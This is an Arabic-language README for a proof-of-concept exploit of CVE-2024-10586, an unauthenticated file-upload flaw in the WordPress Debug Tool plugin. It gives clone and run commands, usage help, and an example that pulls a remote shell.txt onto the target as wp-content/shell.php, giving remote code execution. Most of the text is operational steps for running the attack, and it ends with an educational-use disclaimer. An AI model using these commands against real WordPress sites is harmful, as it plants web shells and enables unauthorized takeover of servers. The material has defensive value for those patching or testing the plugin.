
استغلال إثبات المفهوم لـ CVE-2024-10586 يستهدف إضافة WordPress Debug Tool. يقوم بأتمتة تحميل الملفات التعسفي مما يؤدي إلى تنفيذ التعليمات البرمجية عن بُعد عبر طلبات POST غير مصادق عليها.
الوصف
إضافة Debug Tool لووردبريس معرضة لإنشاء ملفات عشوائية بسبب عدم وجود فحص للصلاحية في الدالة dbt_pull_image() وعدم التحقق من نوع الملف في جميع الإصدارات حتى 2.2.
هذا يتيح للمهاجمين غير الموثوقين إنشاء ملفات عشوائية مثل ملفات .php التي يمكن استخدامها لتنفيذ أكواد عن بُعد.
CVE-2024-10586
git clone https://github.com/Nxploited/CVE-2024-10586-Poc
cd CVE-2024-10586-Poc
تشغيل السكربت باستخدام الأمر التالي: python CVE-2024-10586.py -u -r -p
python CVE-2024-10586.py -u http://192.168.100.74/wordpress -r http://192.168.100.74/shell.txt -p /opt/lampp/htdocs/wordpress/wp-content/shell.php
python CVE-2024-10586.py -u http://192.168.100.74/wordpress -r http://192.168.100.74/shell.txt -p /opt/lampp/htdocs/wordpress/wp-content/shell.php
usage: CVE-2024-10586.py [-h] -u URL -r REMOTE [-p PATH]
Send a POST request to WordPress admin-ajax.php.
options:
-h, --help show this help message and exit
-u URL, --url URL The base URL of the WordPress site.
-r REMOTE, --remote REMOTE
The remote URL to use in the 'source' parameter.
-p PATH, --path PATH The file path to use in the 'missed' parameter. Defaults to '/opt/lampp/htdocs/wordpress/wp-content/Nxploit.php'.
هذا السكربت لأغراض تعليمية فقط. استخدمه بمسؤولية وفقط على الأنظمة التي تملكها أو لديك إذن صريح لاختبارها. المؤلفون غير مسؤولين عن أي سوء استخدام أو ضرر ناتج عن هذه الأداة.